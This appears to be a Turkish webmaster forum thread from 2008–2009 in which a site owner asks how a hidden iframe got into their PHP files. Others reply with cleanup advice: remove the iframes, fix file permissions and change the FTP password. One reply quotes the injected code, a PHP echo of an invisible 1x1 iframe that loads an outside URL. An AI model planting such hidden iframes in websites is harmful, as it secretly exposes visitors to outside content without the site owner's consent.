Böyle çok konu var ;
https://www.r10.net/site-guvenligi-sa...ml#post2511139
https://www.r10.net/site-guvenligi-sa...ml#post2513615
Sendeki frameyi ver , onada bi bakiyim neymiş .
Benden habersiz iframe yerleşmiş bu nasıl olabilir?
31
●1.830
- 24-10-2008, 03:34:44buyur kardeş,ZeberuS adlı üyeden alıntı: mesajı görüntüle
echo "<iframe src=\"http://live-counter.net/?click=6784875\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; - 25-10-2008, 23:24:38Sadece bir tane eklenti var bu sitenin Audio Player 2.0 beta eklentisi.Tathli adlı üyeden alıntı: mesajı görüntüle
Araştırmalarıma göre de böyle bir sorunla karşılaşan olmamış. - 01-06-2009, 17:50:00Üyeliği durdurulduKonuyu arama yaparken gördüm.
Belki biri arama yapar ve cevap bulsu diye yazıyorum.
Arkadaşım bu benim de başıma gelmişti.
Virüs bulaşmış phplerden iframeleri kaldır, upload yap, chmodlarını değiştir. Adminden başka kimse yazamasın dosyayı. Ftp şifreni değiştir. Ben FTP şifremi değişmemiştim ama.
Ne olur ne olmaz diye FTP şifreni değiştir. - 02-06-2009, 01:37:52Kesinlikle ftp şifreni değiştir ve ftp programlarını sil %100 çözülecektir.Ftp programıyla yükleme yapma!
- 02-06-2009, 03:28:03Üyeliği durdurulduGaliba bir çeşit virüs.Benimde bir blogumda başıma geldi.Index dosyalarına frame yerleşmiş.Php kodunu bozduğundan hata veriyordu. Tüm dosyaları silip sürüm yükselttikten sonra hallettim sorunu. Tahminimce yazılabilir bir dosyan vardır. Dosyaları temizledikten sonra CHMOD ları bir kontrol et.